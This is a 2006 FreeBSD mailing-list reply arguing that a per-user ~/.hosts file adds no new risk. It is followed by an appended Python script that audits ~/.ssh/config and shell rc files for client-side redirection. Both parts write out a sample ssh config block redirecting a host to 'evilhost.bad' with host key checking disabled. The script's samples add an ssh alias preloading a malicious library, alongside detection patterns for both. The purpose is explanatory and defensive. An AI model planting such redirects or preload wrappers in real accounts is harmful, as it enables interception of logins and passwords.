Date:      Wed, 21 Jun 2006 09:57:10 -0500
From:      Craig Boston <craig@xfoil.gank.org>
To:        Peter Ross <Peter.Ross@alumni.tu-berlin.de>
Cc:        Mike Jakubik <mikej@rogers.com>, "freebsd-current@freebsd.org" <freebsd-current@freebsd.org>, Justin Hibbits <jrh29@eecs.cwru.edu>
Subject:   Re: ~/.hosts patch
Message-ID:  <20060621145710.GA12942@nowhere>
In-Reply-To: <Pine.LNX.4.64.0606211658340.3151@localhost.localdomain>
References:  <Pine.LNX.4.64.0606211658340.3151@localhost.localdomain>

On Wed, Jun 21, 2006 at 04:59:09PM +1000, Peter Ross wrote:
> If you are able to hack your way into a machine you can write this file 
> so later attempts to connect to a remote machine can be redirected (e.g. 
> useful to get login passwords) - you do not need root access to achieve 
> it.

If you are able to hack your way into a machine you can write something
like this into ~/.ssh/config

Host goodhost
    HostKeyAlias Own3d
    StrictHostKeyChecking no
    HostName evilhost.bad

For that matter, you could add aliases to .shrc or .cshrc to run some
wrapper program instead.  Say, one that sets LD_PRELOAD=~/.libevil.so,
which contains custom gethost* functions.

Or have it run a custom ssh binary that doesn't do any host key checking
at all, or logs all passwords somewhere.

Once an account is compromised, all bets are off.  You can't assume that
DNS lookups are valid as your C library may be overridden by something
local to the account.  The login shell could be trojaned to hide the
files.  Other users would of course be unaffected (so long as you didn't
give up the root password).

I don't think the ~/.hosts idea adds any additional risk.  If anything,
a ~/.hosts compromise would be easier to detect than more complex
methods.

Craig
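As an added illustration of the defender's side of this exchange (not code from the message or from FreeBSD), the script below audits a user's ~/.ssh/config and shell rc file for the two patterns Craig describes: a Host block that disables strict host key checking or pins a HostKeyAlias while pointing HostName elsewhere, and an rc line that sets LD_PRELOAD or wraps the ssh client in an alias. Both inputs are constructed samples modelled on the message; the function names and the exact heuristics are this example's own choices, not any tool's API.

```python
"""Audit a user's ~/.ssh/config and shell rc for client-side redirection.

Added example, not part of the original message.  Sample inputs are
constructed to resemble the config fragment quoted in the thread.
"""
import re
from typing import Dict, List

# Constructed sample ~/.ssh/config: one ordinary entry, one modelled on
# the redirecting block shown in the message.
SAMPLE_SSH_CONFIG = """\
# normal entry: alias to an internal build box
Host build
    HostName build.example.internal
    User craig

Host goodhost
    HostKeyAlias Own3d
    StrictHostKeyChecking no
    HostName evilhost.bad
"""

# Constructed sample ~/.shrc: ssh wrapped with a preloaded library.
SAMPLE_SHRC = """\
PATH=$HOME/bin:$PATH
alias ssh='LD_PRELOAD=$HOME/.libevil.so /usr/bin/ssh'
"""


def parse_ssh_config(text: str) -> List[Dict[str, str]]:
    """Split ssh_config text into Host blocks.

    Returns one dict per block: {'Host': pattern, <keyword>: value, ...}
    with keywords lower-cased, since ssh(1) matches them case-insensitively.
    Comments and blank lines are skipped; 'Key value' and 'Key=value' both parse.
    """
    blocks: List[Dict[str, str]] = []
    current = None
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        m = re.match(r'(\S+?)\s*=?\s+(.*)', line) or re.match(r'(\S+)=(.*)', line)
        if m is None:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == 'host':
            current = {'Host': value}
            blocks.append(current)
        elif current is not None:
            current[key] = value
    return blocks


def audit_ssh_config(text: str) -> List[Dict[str, object]]:
    """Flag Host blocks that weaken host key verification.

    A block is reported when it sets 'StrictHostKeyChecking no' or pins a
    HostKeyAlias; HostName is included so the reviewer sees where the
    connection would actually go.
    """
    findings = []
    for block in parse_ssh_config(text):
        reasons = []
        if block.get('stricthostkeychecking', '').lower() == 'no':
            reasons.append('StrictHostKeyChecking no')
        if 'hostkeyalias' in block:
            reasons.append('HostKeyAlias ' + block['hostkeyalias'])
        if reasons:
            findings.append({
                'host': block['Host'],
                'redirects_to': block.get('hostname', block['Host']),
                'reasons': reasons,
            })
    return findings


def suspicious_rc_lines(text: str) -> List[str]:
    """Return rc lines that set LD_PRELOAD or alias the ssh family of clients."""
    hits = []
    for line in text.splitlines():
        stripped = line.strip()
        if re.search(r'\bLD_PRELOAD=', stripped):
            hits.append(stripped)
        elif re.match(r'alias\s+(ssh|scp|sftp)\b', stripped):
            hits.append(stripped)
    return hits


if __name__ == '__main__':
    for f in audit_ssh_config(SAMPLE_SSH_CONFIG):
        print(f"Host {f['host']} -> {f['redirects_to']}: {', '.join(f['reasons'])}")
    for line in suspicious_rc_lines(SAMPLE_SHRC):
        print('rc:', line)
```

Run against real files by reading `~/.ssh/config` and `~/.shrc` or `~/.cshrc` in place of the constructed samples; the ordinary `build` block is deliberately not reported, since an alias whose HostName differs is normal and only becomes worth a look when verification is also relaxed.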
